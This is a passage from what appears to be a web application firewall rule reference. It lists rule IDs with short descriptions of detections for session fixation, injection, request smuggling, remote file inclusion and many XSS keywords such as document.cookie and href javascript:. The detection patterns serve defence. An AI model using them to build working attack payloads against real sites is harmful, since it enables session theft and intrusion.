Detects Session Fixation, an attack technique that forces a user's session ID to an explicit value. Depending on the functionality of the target website, several techniques can be utilized to "fix" the session ID value. These techniques range from Cross-site Scripting exploits to peppering the website with previously made HTTP requests. After a user's session ID has been fixed, the attacker will wait for that user to log in. Once the user does so, the attacker uses the predefined session ID value to assume the same online identity.

950010

LDAP Injection

Detects common LDAP data constructions injections.

950011

SSI Injection

Detects common Server-Side-Include format data injections.

950012

HTTP Request Smuggling

Detects specially crafted requests that under certain circumstances could be seen by the attacked entities as two different sets of requests. This allows certain requests to be smuggled through to a second entity without the first one realizing it.

950018

UPDF XSS Injection

Detects submitted links that contains the # fragment in a query_string.

Detects when an attacker attempts to access trojan, backdoor, or webshell web page.

950116

Unicode Encoding/Decoding Validation

blocks full-width Unicode encoding as decoding evasions could be possible.

950117

URL Contains an IP Address

Detects a common RFI attack, when a URL contains an IP address.

950118

PHP Include() Function

Detects a common RFI php include() function attacks.

950119

Data Ends with Question Mark(s) (?)

Detects a common RFI attack, when data ends with question mark(s) (?).

950120

Host Doesn't Match Localhost

Detects a common RFI attack, when host doesn't match localhost.

950801

UTF Encoding Validation

Detects UTF encoding inconsistencies and invalid formatting.

950907

OS Command Injection

Detects OS command injection in an application to elevate privileges, execute arbitrary commands, compromise the underlying operating system and install malicious toolkits such as those to participate in botnet attacks.

950910

HTTP Response Splitting

Detects Carriage Return + Linefeed characters in the response header that could cause attacked entities to interpret it as two separate responses instead of one.

958000

Addimport XSS Attack

Detects usage of addimport in request, cookies, or arguments.

958001

document Cookie XSS Attack

Detects usage of document.cookie in request, cookies, or arguments.

958002

execscript XSS Attack

Detects usage of execscript in request, cookies, or arguments.

958003

fromcharcode XSS Attack

Detects usage of fromcharcode in request, cookies, or arguments.

958004

innerhtml XSS Attack

Detects usage of innerhtml in request, cookies, or arguments.

958005

cdata XSS Attack

Detects usage of cdata in request, cookies, or arguments.

958006

body background XSS Attack

Detects usage of <body background in request, cookies, or arguments.

958007

onload XSS Attack

Detects usage of onload in request, cookies, or arguments.

958008

input type image XSS Attack

Detects usage of <input type image in request, cookies, or arguments.

958009

import XSS Attack

Detects usage of import in request, cookies, or arguments.

958010

activexobject XSS Attack

Detects usage of activexobject in request, cookies, or arguments.

958011

background-image: XSS Attack

Detects usage of background-image: in request, cookies, or arguments.

958012

copyparentfolder XSS Attack

Detects usage of copyparentfolder in request, cookies, or arguments.

958013

createtextrange XSS Attack

Detects usage of createtextrange in request, cookies, or arguments.

958016

getparentfolder XSS Attack

Detects usage of getparentfolder in request, cookies, or arguments.

958017

getspecialfolder XSS Attack

Detects usage of getspecialfolder in request, cookies, or arguments.

958018

href javascript: XSS Attack

Detects usage of href javascript: in request, cookies, or arguments.

958019

href schell XSS Attack

Detects usage of href schell in request, cookies, or arguments.

958020

href vbscript: XSS Attack

Detects usage of href vbscript: in request, cookies, or arguments.

958022

livescript: XSS Attack

Detects usage of livescript: in request, cookies, or arguments.

958023

lowsrc javascript: XSS Attack

Detects usage of lowsrc javascript: in request, cookies, or arguments.